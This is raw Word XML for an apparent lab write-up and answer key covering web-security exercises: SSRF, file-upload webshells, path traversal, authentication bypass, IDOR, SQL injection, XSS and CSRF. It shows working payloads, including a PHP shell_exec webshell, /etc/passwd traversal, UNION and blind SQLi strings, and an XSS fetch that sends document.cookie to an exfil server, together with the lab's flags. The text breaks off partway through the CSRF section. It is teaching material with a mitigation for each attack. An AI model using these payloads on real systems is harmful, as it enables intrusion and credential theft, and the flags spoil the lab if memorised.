        <w:t xml:space="preserve">Activity 1: Basic SSRF against Local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an internal admin panel via SSRF vulnerability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fetches URLs provided by user without restriction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Found a functionality (e.g., fetch/preview URL) that makes server-side requests. Using Firefox Page Inspector, identified the vulnerable parameter. Changed the target URL to the internal admin panel (http://localhost:30000/v1/admin). Server fetched it on our behalf, bypassing browser-level access restriction. Then used SSRF to trigger user deletion.</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http://localhost:30000/v1/admin#http://api.bodhitree.com:30000/v1/syllabus/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">http://localhost:30000/v1/admin/delete?userid=23204#http://api.bodhitree.com:30000/v1/syllabus/</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FLAG{S3rver_s1d3_R3quests_Ar3_difficult_t0_st0p_N9TgZQwv}</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Validate and whitelist URLs the server is allowed to fetch. Block requests to internal/private IP ranges (127.x, 10.x, 192.168.x).</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SSRF Against Blacklist-Based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blacklist to access internal admin panel via SSRF</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Blacklist-based input filter is bypassable via encoding</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Same as Activity 1 but blacklisted words: 127.0.0.1, 127.0.0.1:30000, ::1, localhost, localhost:30000, admin, delete, adduser. Used URL encoding / alternative representations to bypass the filter (e.g., 127.1 instead of 127.0.0.1, decimal IP notation, double encoding).</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Encoding tricks: 127.1, %6c%6f%63%61%6c%68%6f%73%74, 0x7f000001, etc.</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FLAG{S3rver_s1d3_R3quests_Ar3_difficult_t0_st0p_N9TgZQwv}</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Blacklists are insufficient. Use an allowlist of specific permitted URLs/domains. Parse and re-serialize URLs to prevent encoding bypasses.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4: SSRF Against Whitelist-Based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whitelist to access internal admin panel via SSRF</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Whitelist checks only if whitelisted URL appears in the string</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Whitelist allows only one specific URL. The trick: include the whitelisted URL in the attack URL using the URL fragment (#). Browser ignores fragment, but naive whitelist check sees the whitelisted URL string and passes it. Server then fetches the actual malicious URL.</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http://localhost:30000/v1/admin#http://whitelisted-url.com/</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Parse URLs properly before checking. Use a robust URL parsing library. Fragment (#) should be stripped before whitelist comparison.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="200"/>
      </w:pP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Lab 5: File Upload /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5276"/>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Code Execution via File Upload</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Activity 1: Simple Arbitrary File Upload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PHP shell to execute arbitrary commands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file type validation on upload endpoint</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Profile picture upload at /userDetails.php accepts any file. Uploaded a PHP webshell. Used Firefox Page Inspector to find the uploaded file URL. Visited the URL to execute the shell and get command output.</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shell.php content:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">GIF87a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?php $output=shell_exec('id'); echo "&lt;pre&gt;$output&lt;/pre&gt;"; ?&gt;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FLAG{Upl0ad1ng_Arb1trary_F1l3s_t0_3x3cut3_sh3ll_c0mmands_6uJLOGLx}</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Validate file type server-side (not just client-side). Use allowlist of permitted extensions. Store uploads outside webroot. Rename uploaded files.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Blacklisted Extensions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extension blacklist to upload PHP shell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Blacklist blocks .php, .php2-.php5, .phtml, .shtml — but not all variants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Used .htaccess trick: uploaded a .htaccess file to make the server treat a different extension as PHP. Then uploaded the shell with that alternate extension. Alternatively, tried .pHp, .php6, .php7 if not blacklisted.</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Upload .htaccess with: AddType application/x-httpd-php .xyz</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Then upload shell.xyz</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FLAG{Upl0ad1ng_Arb1trary_F1l3s_t0_3x3cut3_sh3ll_c0mmands_6uJLOGLx}</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Use an allowlist (only jpg/png/gif). Don't allow .htaccess uploads. Use server-side MIME detection.</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Whitelist + Image Header Check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whitelist (jpg/png/gif only) AND magic byte image header check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 whitelist + image header check both bypassable</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Approach: Prepend GIF magic bytes (GIF87a) to the PHP code. Rename file to shell.php%00.gif (null byte truncation). Server checks .gif extension (passes whitelist), magic bytes look like GIF (passes header check), but PHP interpreter executes the code after the GIF header.</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File: GIF87a\n&lt;?php shell_exec('id'); ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Filename: shell.php%00.gif</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FLAG{Upl0ad1ng_Arb1trary_F1l3s_t0_3x3cut3_sh3ll_c0mmands_6uJLOGLx}</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Use a proper image library to re-process uploads (strips embedded code). Store uploads outside webroot. Use a CDN/blob storage for user uploads.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="145A32" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="145A32"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Lab 6: Path Traversal / Directory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45A32"/>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Traversal – Simple &amp; With Defensive Checks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Activity 1: Simple Path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/etc/passwd via directory traversal vulnerability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parameter in course details page not sanitized</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Found a file parameter in the course details page using Firefox Page Inspector. Changed the value to a traversal payload to escape the webroot and read /etc/passwd.</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file=../../../../../etc/passwd</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FLAG{L3ak1ng_1nformation_v1a_Dir3ct0ry_Trav3rsal_yHNxlrqm}</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Use a whitelist of allowed filenames. Resolve absolute path and check it starts with the intended directory. Never pass user input directly to file open functions.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Path Traversal with Defensive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two simple defenses to read /etc/passwd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Naive sanitization: blocks ../ and checks file extension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Two defenses in place: (1) blocks ../ sequences, (2) requires specific extension. Bypass: (1) use ..%2F (URL-encoded slash) or ..%252F (double-encoded) or ....// to survive filter. (2) append null byte + expected extension: /etc/passwd%00.html</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csrfmiddlewaretoken=...&amp;file=..%2F..%2F..%2F..%2F..%2Fetc%2F.%2Fpasswd%2500.html</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FLAG{L3ak1ng_1nformation_v1a_Dir3ct0ry_Trav3rsal_yHNxlrqm}</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Decode URL encoding before sanitizing. Use realpath() and check prefix. Never rely on blacklist-only checks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="6E2F8F" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="6E2F8F"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Lab 7: Broken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6E2F8F"/>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Brute Force, Username Enumeration, 2FA Bypass, Broken Reset</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Activity 1: Password Bruteforce (IP Blocking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Crack admin password while bypassing IP-based rate limiting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blocking at application layer; bypassable via X-Forwarded-For header</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After 5 failed attempts, the IP is blocked. Application reads X-Forwarded-For header to identify client IP (application-layer block). Solution: rotate X-Forwarded-For header value with each request. Used a Python script fuzzing two fields: password from wordlist + rotating IP in X-Forwarded-For header.</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Python script: for each password, set X-Forwarded-For: 10.0.0.{i} to change apparent IP</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FLAG{Auth3nt1cat1on_byp4ss_successful_F0XBiYga}</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Implement rate limiting at network layer (not application). Add CAPTCHA after failed attempts. Use exponential backoff. Block at firewall level.</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Username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Enumerate valid username (admin_XX format) then crack password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response for valid vs invalid usernames; flawed blocking logic</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Valid usernames follow format admin_XX (2 lowercase letters). Used ZAP fuzzer with regex [a-z]{2} to fuzz the suffix. Observed response differences (size/code) to identify valid username. Password blocking was flawed — not IP-based here. Used ZAP to fuzz password with the provided list.</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ZAP regex fuzzer: admin_[a-z]{2} pattern for username enumeration</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FLAG{Auth3nt1cat1on_byp4ss_successful_F0XBiYga}</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Return identical responses for valid/invalid usernames. Implement consistent timing. Rate limit per username, not just IP.</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Broken 2FA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as admin by exploiting broken 2FA implementation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2FA OTP not tied to the authenticated user session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2FA sends OTP (0000-9999) to user's email. Flaw: OTP verification step doesn't check which user requested the OTP. Steps: (1) send login for admin, (2) separately request OTP as Laksh, (3) fuzz all 10,000 OTP values via ZAP fuzzer on the OTP verification request while keeping admin's session cookie in the first request.</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ZAP fuzzer: regex \d{4} (0000-9999) on OTP field; edit username to 'admin' in first request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FLAG{Auth3nt1cat1on_byp4ss_successful_F0XBiYga}</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Tie OTP to user session at generation time. Expire OTPs quickly. Limit OTP attempts.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4: Broken Forgot Password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admin password without knowing it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reset token not properly validated (predictable or reusable)</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Initiated password reset for Laksh (known user) to observe the reset token format. Discovered the token is not tied to the username — any valid token works for any account. Requested reset for admin, intercepted/reused a known token structure to reset admin password.</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Reset URL: /reset-password?token=c08dd606-01c5-4050-be40-e9515170286f&amp;username=admin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">(Token from Laksh reused with username=admin)</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FLAG{Auth3nt1cat1on_byp4ss_successful_F0XBiYga}</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Tie reset tokens to specific user accounts server-side. Tokens must be single-use and expire quickly. Never trust username from URL parameter.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="200"/>
      </w:pP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Lab 8: Broken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5276"/>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&amp; Horizontal Privilege Escalation, IDOR</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Activity 1: Vertical Privilege Escalation (URL Bruteforce + Cookie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admin panel by guessing URL; access teachers page by modifying role cookie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by obscurity (admin URL); insecure cookie-based role check</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Part A: Brute-forced /v1/XYZ paths using ZAP fuzzer with a wordlist. Found the admin URL. Added user 'Virat' via admin panel (accessed through SSRF or direct if logged in). Part B: Teachers page checks the 'role' cookie. Changed cookie value from 'student' to 'teacher' using browser Storage tab. Changed Laksh's grade to 100.</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Cookie: sessionid=edspynz3dl71c36hho27anm53xkwjcmb; role=admin</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FLAG{Acc3ss_D3ni3d_Or_Th4ts_Wh4t_1_Th0ught_SiIWlEbh}</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rely on client-side role values. Validate access permissions server-side on every request. Use cryptographically signed tokens if role must be in cookie.</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Horizontal Privilege Escalation via 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other users' data and find a hidden password via IDOR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IDOR: user ID in URL parameter not validated against session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Help page URL: /help/?userid=23208. Simply changed the userid to access other users' chat histories. Found another student's password in their chat. Also enumerated the profile/user data endpoint to find Anita's phone number by iterating user IDs.</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/help/?userid=23208 → change to other user IDs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Key Answers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Flag obtained by logging in as another user</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Phone of Anita: 914321098767</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FLAG{Acc3ss_D3ni3d_Or_Th4ts_Wh4t_1_Th0ught_J3mNJt9k}</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Always validate that the requesting user owns the requested resource. Use indirect references (UUIDs) instead of sequential IDs.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Privilege Escalation via User Role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grades in CS224 using Rajesh (TA) session or Laksh session with role manipulation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server-side authorization; role stored in cookie and not properly verified</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Logged in as Rajesh (TA). Used ZAP to identify the grade update POST request. Modified the request to target Laksh's grade in CS224. Then replayed with Laksh's session cookie + role=admin cookie to see if Laksh can do it himself. Changed endsem marks to 100.</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POST to grade update endpoint with: Rajesh session ID + modified courseid/userid params; or Laksh session + role=admin cookie</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FLAG{Acc3ss_D3ni3d_Or_Th4ts_Wh4t_1_Th0ught_SiIWlEbh}</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Server must verify role FROM DATABASE on each request, not from cookie. Implement proper course-level TA permission checks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="922B21" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="922B21"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Lab 9: SQL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922B21"/>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Bypass, UNION-Based, Blind SQL Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Activity 1: Authentication Bypass via SQLi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as admin without knowing the password using SQL injection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query uses unsanitized user input</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Entered SQLi payload in the username field. The payload breaks the SQL query logic, making the WHERE clause always true, thus logging in without a valid password. Note: SQL comment (--) needs a trailing space; URL encoding or adding a character after handles this.</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Username: admin'-- -   (or: admin'/*)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Password: anything</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FLAG{SQL_1nject1on_d0n3_successfully_38hsUCtH}</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Use parameterized queries / prepared statements. Never concatenate user input into SQL strings.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Data Exfiltration via UNION-Based SQLi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admin password from a separate table using UNION SELECT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field reflects unsanitized input into SQL query</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The search query: SELECT sno, username, courseid, waitlisted FROM userdetails WHERE courseid='$courseid' AND username='$search'. Users table has: sno, username, password. Crafted UNION SELECT to append Users table data to the query result. Needed to match column count (4) and data types.</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search=Laksh' UNION SELECT sno, concat(username,'~',password), 4, 0 FROM users ; -- </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">(URL encoded in the actual payload)</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FLAG{SQL_1nject1on_d0n3_successfully_38hsUCtH}</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Parameterized queries. If filtering output, never use denylist. Principle of least privilege for DB user.</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Data Exfiltration via Blind SQLi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admin password without direct output (boolean-based blind SQLi)</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courseid parameter injectable; result only shows count (true/false)</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The page shows student count. A true condition = non-zero count; false = 0. This binary oracle allows character-by-character extraction. Automated with Python script: enumerate row count → enumerate username length → enumerate each character → enumerate password length → enumerate each password character.</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Python blind SQLi script (exploit.py):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- Boolean payloads like: ' and exists(select 1 from users where substring(password,{i},1)='{ch}') ; -- abc</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FLAG{SQL_1nject1on_d0n3_successfully_38hsUCtH}</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Parameterized queries. The fact that even blind channels (counts) can leak data demonstrates why parameterized queries are the ONLY real fix.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="200"/>
      </w:pP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Lab 10: XSS (Cross-Site Scripting)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5276"/>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Reflected XSS, Stored XSS, Cookie Theft, Blacklist Bypass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Activity 1: Stored &amp; Reflected XSS + Cookie Theft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XSS attacks; steal admin cookie using exfil server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field (reflected) and comments (stored) don't sanitize script tags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Part 1 (Reflected): Injected &lt;script&gt;alert('hacked')&lt;/script&gt; into participants search URL. Part 2 (Stored): Same payload in grade comment field. Part 3 (Cookie theft): Replaced alert with fetch to attacker server, sending document.cookie.</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Part1: ?search=&lt;script&gt;alert('hacked')&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Part2: Stored in comment field</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Part3: ?search=&lt;script&gt;fetch('http://localhost:30001/log?key='+document.cookie)&lt;/script&gt;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FLAG{XSS_D0n3_F1n3_IkoEBE5M}</w:t>
      </w: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FLAG{XSS_D0n3_F1n3_7IrlWTpq}</w:t>
      </w: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FLAG{XSS_D0n3_F1n3_cFM5yZcy}</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Encode output (HTML encode all user-supplied data before rendering). Content Security Policy (CSP). HttpOnly flag on session cookies.</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Reflected XSS with Blacklist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XSS blacklist filter to launch attack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Blacklist removes 'script' and 'alert'; encodes &lt;, &gt;, " but only once</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Blacklist: removes 'script', 'alert'; HTML-encodes &lt;, &gt;, ". Bypass: embed the filtered words within themselves so removal creates the intended word. E.g., &lt;scriscriptpt&gt; → after 'script' removed from middle → &lt;script&gt;. Same for alert → aleralert → alert after removal.</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%253Cscriscriptpt%253Ealeralertt%2528%2522hacked%2522%2529%253C%2Fscrscriptipt%253E</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FLAG{XSS_D0n3_F1n3_cFM5yZcy}</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use denylist for XSS prevention. Always HTML-encode output. Use a proper sanitization library. Implement CSP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1E8449" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1E8449"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Lab 11: CSRF (Cross-Site Request Forgery)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8449"/>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CSRF, Token Bypass (Not Tied to Session), Token + Cookie Bypass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Activity 1: Simple CSRF (No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admin email via CSRF with no CSRF token protection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State-changing action (email update) has no CSRF token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Explored /userDetails page — found POST form to update email. No CSRF token in form. Created malicious HTML page with an auto-submitting form targeting the email update endpoint. Hosted on exploit server (localhost:30001). When admin visits, email is changed.</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&lt;form action='http://localhost:30000/updateEmail/' method='POST'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;input type='hidden' name='new_email' value='attacker@evil.com'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
